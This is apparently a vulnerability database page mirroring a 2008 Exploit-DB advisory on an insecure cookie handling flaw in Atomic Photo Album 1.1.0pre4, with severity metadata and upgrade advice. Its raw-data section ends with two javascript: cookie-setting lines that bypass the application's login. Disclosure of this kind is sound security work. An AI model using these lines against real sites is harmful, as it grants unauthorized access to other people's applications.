header-logo
Suggest Exploit
vendor:
Atomic Photo Album
by:
Stack
7.5
CVSS
HIGH
Insecure Cookie Handling
614
CWE
Product Name: Atomic Photo Album
Affected Version From: 1.1.0pre4
Affected Version To: 1.1.0pre4
Patch Exists: YES
Related CWE: N/A
CPE: a:atomicphotoalbum:atomic_photo_album
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Atomic Photo Album 1.1.0pre4 Insecure Cookie Handling Vulnerability

Atomic Photo Album 1.1.0pre4 is vulnerable to an insecure cookie handling vulnerability. This vulnerability allows an attacker to gain access to the application without authentication. By setting the apa_cookie_login and apa_cookie_password cookies to a known value, an attacker can gain access to the application.

Mitigation:

Upgrade to the latest version of Atomic Photo Album.
Source

Exploit-DB raw data:

###############################################################################################
[+] Atomic Photo Album 1.1.0pre4 Insecure Cookie Handling Vulnerability
[+] Discovered By Stack              
[+] Greetz : All my freind             
################################################################################################
javascript:document.cookie = "apa_cookie_login=foo; path=/;";
javascript:document.cookie = "apa_cookie_password=bar; path=/;";

# milw0rm.com [2008-09-26]

Navigation

Suggest Exploit

Services By CQR